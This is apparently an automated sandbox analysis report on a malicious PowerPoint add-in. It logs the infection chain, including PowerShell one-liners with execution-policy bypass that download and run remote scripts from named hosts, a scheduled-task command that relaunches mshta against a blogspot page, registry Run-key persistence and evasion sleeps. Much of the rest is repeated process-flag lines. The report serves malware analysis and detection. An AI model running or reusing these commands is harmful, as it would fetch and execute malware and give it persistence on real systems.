Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 63 /tn ""kqopaueyu"" /F /tr ""\""MsHtA""\""https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html\"
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {99CBF033-5891-4579-A9C8-09ABEC64739D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\MsHtA.EXE "https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a6990275
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ((gp HKCU:\Software).cookerr)|IEX
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\MsHTa.exe" "http://www.starinxxxgkular.duckdns.org/s1/30.txt
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\System32\mshta.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Credit Card and ID.LNK
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE File created: C:\Users\user\AppData\Local\Temp\CVRDCA8.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winPPAM@20/25@13/8
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: mshta.exe, 00000005.00000002.441801634.0000000004140000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbrogr source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbiles source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbLE=C source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\mshta.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run cjoemkurieiw
Creates multiple autostart registry keys
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pilodkis
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run cjoemkurieiw
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run cjoemkurieiw pOwersHelL.exe -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 63 /tn ""kqopaueyu"" /F /tr ""\""MsHtA""\""https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html\"
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run cjoemkurieiw
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pilodkis

Hooking and other Techniques for Hiding and Protection:

Stores large binary data to the registry
Source: C:\Windows\System32\mshta.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 2980 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 2992 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2552 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\taskeng.exe TID: 2844 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 2412 Thread sleep time: -780000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1240 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 1176 Thread sleep time: -480000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2044 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\mshta.exe TID: 1284 Thread sleep time: -420000s >= -30000s
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 0000000B.00000002.453616182.0000000000362000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Anti Debugging:

Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\mshta.exe Memory protected: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Bypasses PowerShell execution policy
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
